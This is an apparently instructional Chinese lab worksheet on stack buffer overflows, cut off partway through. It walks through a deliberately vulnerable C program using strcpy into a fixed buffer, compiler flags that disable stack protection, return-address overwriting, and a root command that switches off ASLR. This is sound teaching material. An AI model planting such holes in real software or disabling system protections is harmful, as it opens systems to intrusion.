理解栈地址溢出和Shellcode-BITNETLABHome.DOCVIP

理解栈地址溢出和Shellcode 使用 本文档以通关方式撰写，完成一关进入下一关，请将需要填写的内容写在空白处。 概述 这个练习用来帮助大家理解栈溢出原理。这需要启动Linux操作系统，32位。 GATE 1 用编辑器（vim或其他）输入如下代码，命名为ans_check2.c。 #include stdio.h #include stdlib.h #include string.h int check_answer(char *ans) { int ans_flag = 0; char ans_buf[32]; //注意此行的变化 printf(ans_buf is at address %p\n, ans_buf); strcpy(ans_buf, ans); if (strcmp(ans_buf, forty-two) == 0) ans_flag = 1; return ans_flag; } int main(int argc, char *argv[]) { if (argc 2) { printf(Usage: %s answer\n, argv[0]); exit(0); } if (check_answer(argv[1])) { printf(Right answer!\n); } else { printf(Wrong answer!\n); } } 这个代码与ans_check.c相似，不同的地方用蓝色粗体表示，请理解该代码的功能。（注意check_answer函数第二行的变化） 用如下指令编译该程序： gcc ans_check2.c -g -z execstack -fno-stack-protector -o ans_check2 其中，选项“-z execstack”表示栈可以执行（栈中可以包含运行指令）。运行如下指令，将输出结果粘贴在空白处： ./ans_check2 forty-two GATE 2 现在，用python语言产生输入，运行该程序。 ./ans_check2 $(python -c print 0*5) 其中，python -c print 0*5产生一个字符串00000(5个0)，通过修改其中的数字可以很容易的改变输入0的长度。 通过辅助python代码，我们可以发现 1)通过输入是否可以使程序的栈缓冲区溢出，2) 多长的输入能够使栈缓冲区溢出。 增加输入长度，直到程序因为Segmentation fault而退出。 将产生Segmentation fault的指令和结果粘贴在空白处 GATE 3 Gate2粗略地找到了栈溢出的输入长度，下面，我们将填入有意义的代码，进而劫持程序。 执行下面二进制反编译命令，将输出写在空白处。 objdump -D ans_check2 | grep -B 1 exit 其中，“-B 1”选项可以使grep命令输出包含“exit”行及前一行的信息。这两行代码能够让程序退出。我们将通过修改输入内容，让程序跳转到这两行代码执行，即直接令程序退出。 这里假设这两行代码首地址是0xdeadbeef (根据你的程序地址替换)，执行如下命令： ./ans_check2 $(python -c print \xef\xbe\xad\xde*N) 其中，N是多少，需要你来发现。找到满足如下条件的N： 1）程序能够正常退出； 2）退出时不输出答案正确或错误的信息； 3）没有Segmentation fault错误； 4）N最短。 将你正确的结果连同正确结果的输入一并记录在空白处。 GATE 4 多次执行./ans_check2 forty-three命令观察每次的输出是否相同 如果在gdb环境运行程序，每次输出是相同的，即程序自身缓冲区起始地址（printf语句的输出）和实际的栈中缓冲区地址是一样的。 如果在gdb之外执行程序，它们的值可能是不同的，即每次执行程序，程序printf输出的地址都不同（说明分配的内存栈地址不同）。这是因为：系统可能使用了地址空间布局随机化address space layout randomization (ASLR)，在gdb中，默认不开启ASLR。 ASLR是早期系统防范缓冲区溢出的方法之一该方法已经可以被绕过这里我们暂时不研究高级技术，仅通过系统命令将该方法关闭 执行如下命令：cat /proc/sys/kernel/randomize_va_space # 记下该值 sudo su – echo 0 /proc/sys/kernel/randomize_va_space exit #你可以用e